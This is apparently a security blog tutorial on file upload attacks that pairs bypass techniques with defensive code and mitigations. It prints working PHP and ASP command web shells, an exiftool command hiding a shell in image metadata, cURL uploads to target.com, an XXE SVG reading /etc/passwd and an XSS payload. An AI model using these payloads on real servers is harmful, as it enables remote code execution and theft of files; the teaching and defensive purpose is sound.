Mastering File Upload Attacks: From Bypass to RCE – A Comprehensive Guide + Video


Introduction:

File upload functionalities are ubiquitous in modern web applications—from profile pictures to document sharing. However, insecure implementations can turn them into a critical gateway for attackers. By exploiting weak validation, an adversary can upload malicious files, leading to remote code execution (RCE), data breaches, or full server compromise. This article dissects file upload attack techniques, provides step-by-step exploitation guides, and outlines robust defenses, drawing from real-world modules like HackTheBox’s “File Upload Attacks.”

Learning Objectives:

  • Understand the core validation mechanisms (client-side, server-side, blacklist, whitelist, MIME, magic bytes).
  • Learn how to bypass each control using practical tools and commands.
  • Exploit file upload flaws to achieve RCE and recommend effective mitigations.

You Should Know:

1. Understanding File Upload Validation Mechanisms

File upload security relies on multiple layers of checks. Client-side validation (JavaScript) is trivial to bypass. Server-side validation includes:
– Extension blacklisting (deny .php, .exe)
– Extension whitelisting (allow only .jpg, .png)
– MIME type checking (Content-Type header)
– Content validation (magic bytes / file signatures)

Example: A PHP web shell named `shell.php` might be blocked, but `shell.php5` or `shell.phtml` may pass a poor blacklist.

2. Bypassing Client-Side Validation

Client-side checks are performed in the browser and can be easily circumvented.

Step-by-step guide:

1. Intercept with Burp Suite:

  • Configure your browser to use Burp as a proxy.
  • Attempt to upload a legitimate file (e.g., test.jpg).
  • In Burp’s Proxy tab, capture the request.

2. Modify the request:

  • Change the filename from `test.jpg` to `shell.php`.
  • Adjust the `Content-Type` if needed (e.g., `image/jpeg`).

3. Forward the request and check if the file is accepted.

Alternative with cURL:

curl -F "[email protected];type=image/jpeg" http://target.com/upload

If the server only checks client-side, the PHP file will be uploaded.

3. Bypassing Server-Side Blacklist Extensions

When the server blocks specific extensions (like .php), attackers can try:
– Alternative extensions: `.php3`, `.php4`, `.php5`, `.phtml`, `.phar`
– Case manipulation: `.pHp`, `.PhP` (if the server uses case-sensitive checks)
– Double extensions: `shell.php.jpg` (if server only checks the last part)
– Adding trailing characters: `shell.php.` (Windows may strip the dot)

Step-by-step test:

1. Create a simple PHP info file:

<?php phpinfo(); ?>

Save as `shell.php5`.

2. Upload using a form or cURL:

curl -F "[email protected]" http://target.com/upload

3. If successful, access the file at `http://target.com/uploads/shell.php5` to verify execution.

Blacklist bypass via misconfiguration:

Some servers use a regex that only blocks exact matches. Try `shell.php.jpg`: if the server saves it as `shell.php.jpg` but the web server processes `.php` first, it may still execute.
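Why an exact-match blacklist fails, as an added example that is not code from the original article: it runs the filenames listed in this section through a weak blacklist and through an allowlist that normalises the name first. The function names and the sample list are illustrative assumptions.

```python
import os

# Constructed sample names, taken from the bypass list in this section.
SAMPLES = ["photo.jpg", "shell.php", "shell.php5", "shell.phtml",
           "shell.pHp", "shell.php.jpg", "shell.php.", "shell.phar"]

BLACKLIST = {".php", ".exe"}           # the weak control described above
ALLOWLIST = {".jpg", ".png", ".pdf"}   # extensions from the mitigation list


def weak_blacklist_accepts(filename: str) -> bool:
    """Exact, case-sensitive match on the last extension only."""
    return os.path.splitext(filename)[1] not in BLACKLIST


def allowlist_accepts(filename: str) -> bool:
    """Normalise the name, then require exactly one allowlisted extension."""
    # Drop any directory part, whichever separator the client sent.
    name = os.path.basename(filename.replace("\\", "/")).lower()
    # Windows strips trailing dots and spaces, so strip them before checking.
    name = name.rstrip(". ")
    stem, ext = os.path.splitext(name)
    # A dot left in the stem means a double extension such as shell.php.jpg.
    return bool(stem) and "." not in stem and ext in ALLOWLIST


def compare(names=SAMPLES):
    """Map each name to (accepted by blacklist, accepted by allowlist)."""
    return {n: (weak_blacklist_accepts(n), allowlist_accepts(n)) for n in names}


if __name__ == "__main__":
    for name, (weak, strict) in compare().items():
        print(f"{name:15} blacklist={weak!s:5} allowlist={strict}")
```

Every variant except the literal `shell.php` passes the blacklist, while the allowlist accepts only `photo.jpg`.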

4. Bypassing Whitelist Extensions via MIME Type and Magic Bytes

Whitelists allow only specific extensions (e.g., .jpg). Attackers can:

– Spoof MIME type: Send `Content-Type: image/jpeg` while uploading a PHP file.
– Embed PHP code within a valid image (polyglot) to bypass content checks.

Creating a polyglot image with embedded PHP:

Using `exiftool` to add PHP code to image metadata:

exiftool -Comment="<?php system($_GET['cmd']); ?>" image.jpg -o malicious.jpg

Or manually edit hex bytes: keep the file signature (e.g., `FF D8 FF E0` for JPEG) and append PHP code at the end.

Step-by-step upload:

1. Prepare `malicious.jpg` containing PHP payload.

2. Upload with cURL, ensuring MIME type is image/jpeg:

curl -F "[email protected];type=image/jpeg" http://target.com/upload

3. If the server checks only MIME and magic bytes, the file is accepted. Access it and append `?cmd=id` to execute commands.

5. Exploiting File Upload for Remote Code Execution (RCE)

Once a malicious file is uploaded, the goal is to execute it. Common scenarios:

– Direct access: If the upload directory is web-accessible, navigate to the file.
– Path traversal: Overwrite critical files (e.g., ../../../../var/www/html/shell.php).
– Race conditions: Upload and request simultaneously to beat deletion routines.

Web shell example (PHP):

<?php system($_GET['cmd']); ?>

Save as `cmd.php`. After upload, visit:

http://target.com/uploads/cmd.php?cmd=ls -la

Windows environment: Use ASP or ASPX shells if the server supports it.

<% response.write(server.createobject("WScript.Shell").exec("cmd /c " & request.querystring("cmd")).stdout.readall) %>
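On the detection side, requests like the ones above stand out in web server logs. The following is an added example, not part of the original article: it scans access-log lines for hits on the upload directory that carry a script extension or a query string. The log lines are constructed, the addresses come from documentation ranges, and the `/uploads/` prefix is assumed from the URLs above.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed access-log lines (combined log format, trailing fields omitted).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2025:10:01:02 +0000] "GET /uploads/a1b2c3.jpg HTTP/1.1" 200 48213
203.0.113.9 - - [10/Mar/2025:10:02:10 +0000] "POST /upload HTTP/1.1" 200 512
203.0.113.9 - - [10/Mar/2025:10:02:11 +0000] "GET /uploads/cmd.php?cmd=id HTTP/1.1" 200 54
203.0.113.9 - - [10/Mar/2025:10:02:15 +0000] "GET /uploads/shell.pHp5 HTTP/1.1" 404 196
203.0.113.9 - - [10/Mar/2025:10:02:19 +0000] "GET /uploads/malicious.jpg?cmd=id HTTP/1.1" 200 48310
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Script-like extension anywhere in the name, case-insensitive.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|asp|aspx)(\.|$)", re.I)


def suspicious_upload_hits(log_text, upload_prefix="/uploads/"):
    """Return (client, path, status, reasons) for suspicious upload-dir hits."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path)          # decode %xx before matching
        if not path.startswith(upload_prefix):
            continue
        reasons = []
        if SCRIPT_EXT.search(path):
            reasons.append("script extension in upload dir")
        if url.query:
            # Stored user files are static; parameters suggest code execution.
            reasons.append("query string on stored upload")
        if reasons:
            findings.append((client, path, int(status), reasons))
    return findings


if __name__ == "__main__":
    for hit in suspicious_upload_hits(SAMPLE_LOG):
        print(hit)
```

A 200 response on a flagged path deserves priority over a 404, since it means the file exists and was served or executed.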

6. Advanced Attacks: XXE, XSS, and ImageTragick

File uploads can also lead to:

  • XXE (XML External Entity): Upload a malicious SVG with embedded XML to read local files.
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    <svg>&xxe;</svg>
    
  • Stored XSS: Upload an HTML file containing <script>alert(1)</script>; if the server serves it with text/html, the script executes.
  • ImageTragick: Exploit ImageMagick vulnerabilities (e.g., CVE-2016-3714) by crafting a malicious image that executes commands when processed.
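A server-side check for the SVG cases above, as an added example that is not from the original article: it parses an uploaded SVG with expat and lists reasons to reject it (a DOCTYPE, script content, event-handler attributes). The function name and the rejection rules are assumptions; the first sample is the SVG shown above and the others are constructed.

```python
import xml.parsers.expat

# The XXE sample from the list above, plus constructed clean and script cases.
SAMPLE_XXE = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
              b'<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
              b'<svg>&xxe;</svg>')
SAMPLE_CLEAN = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>'
SAMPLE_SCRIPT = (b'<svg xmlns="http://www.w3.org/2000/svg" onload="x()">'
                 b'<script>alert(1)</script></svg>')


def svg_rejection_reasons(data: bytes) -> list:
    """Return the reasons an uploaded SVG should be refused (empty if none)."""
    reasons = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Entities can only be declared in a DTD, so refuse any DOCTYPE.
        reasons.append("DOCTYPE declaration (entity definitions possible)")

    def on_start(tag, attrs):
        local = tag.rsplit(":", 1)[-1].lower()   # ignore namespace prefix
        if local in ("script", "foreignobject"):
            reasons.append(f"<{local}> element")
        for key, value in attrs.items():
            if key.lower().startswith("on"):
                reasons.append(f"event handler attribute {key}")
            if value.strip().lower().startswith("javascript:"):
                reasons.append(f"javascript: URL in {key}")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    # No ExternalEntityRefHandler is set, so external entities are never fetched.
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        reasons.append(f"not well-formed XML: {exc}")
    return reasons


if __name__ == "__main__":
    for sample in (SAMPLE_XXE, SAMPLE_CLEAN, SAMPLE_SCRIPT):
        print(svg_rejection_reasons(sample))
```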

7. Mitigation Strategies

To prevent file upload attacks:

  • Use a whitelist of allowed extensions (e.g., .jpg, .png, .pdf).
  • Validate MIME type and file content (magic bytes) server-side.
  • Store files outside the webroot and serve them via a script (e.g., download.php?id=123).
  • Rename files randomly to prevent direct access and path traversal.
  • Disable execution permissions on upload directories (e.g., `.htaccess` with php_flag engine off).
  • Scan files with antivirus or sandbox before storage.
  • Implement Content Security Policy (CSP) to mitigate XSS.

Example `.htaccess` for upload directory:

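# Apply to every file in the upload directory
<FilesMatch ".">
# Label every file as a generic binary so browsers do not render it
ForceType application/octet-stream
# Force a download instead of inline display (requires mod_headers)
Header set Content-Disposition attachment
</FilesMatch>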
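The storage-side mitigations listed above, combined in one routine as an added example (not code from the original article): content is checked against magic bytes, the stored extension comes from the detected type rather than the client's filename, and the file is written under a random name in a directory assumed to sit outside the webroot. The function names, the size limit and the signature table are assumptions.

```python
import os
import secrets

# Magic bytes for the allowlisted types; the stored extension is derived
# from the detected type, never from the client-supplied filename.
SIGNATURES = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"%PDF-": ".pdf",
}
MAX_BYTES = 5 * 1024 * 1024   # assumed size limit


def detect_extension(data: bytes):
    """Return the extension for a recognised signature, else None."""
    for magic, ext in SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def store_upload(data: bytes, storage_dir: str) -> str:
    """Validate content and save it under a random name in storage_dir.

    Returns the generated name; the application maps it to an ID and
    serves it through a download script, as described above."""
    if len(data) > MAX_BYTES:
        raise ValueError("file too large")
    ext = detect_extension(data)
    if ext is None:
        raise ValueError("content does not match an allowed type")
    name = secrets.token_hex(16) + ext          # unguessable, no user input
    root = os.path.realpath(storage_dir)
    dest = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, dest]) != root:
        raise ValueError("destination escapes storage directory")
    # O_EXCL refuses to overwrite; mode 0o640 sets no execute bit.
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return name
```

A polyglot with a valid JPEG header still passes `detect_extension`, which is why the random name, the non-executable storage location and the download script matter as much as the content check.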

What Undercode Say:

  • Key Takeaway 1: File upload vulnerabilities are a high-risk entry point because they can directly lead to remote code execution. Every layer of validation must be scrutinized—client-side controls are merely a convenience, not a security measure.
  • Key Takeaway 2: A defense-in-depth approach is essential: whitelist extensions, validate content, rename files, and store them outside the web root. Relying on a single check (like MIME type) is a recipe for compromise.

Analysis: The techniques demonstrated—from simple extension fuzzing to polyglot images—highlight the creativity required to bypass modern filters. Security professionals must adopt an attacker mindset and test file upload forms with all possible permutations. Moreover, developers should be trained to understand that file upload is not just a feature but a potential weapon.

Prediction:

As file upload attacks grow more sophisticated, we will see increased use of AI-generated polyglot files that evade signature-based detection. Cloud storage integrations (e.g., S3 buckets) will introduce new misconfigurations, such as public write permissions or lack of server-side validation. Additionally, the rise of serverless architectures may shift the attack surface to API endpoints, where file uploads are processed by third-party services. Expect automated scanning tools to evolve, and defenders to adopt machine learning for anomaly detection in uploaded content. The cat-and-mouse game continues.

Reported By: Mohamed Soliman – Hackers Feeds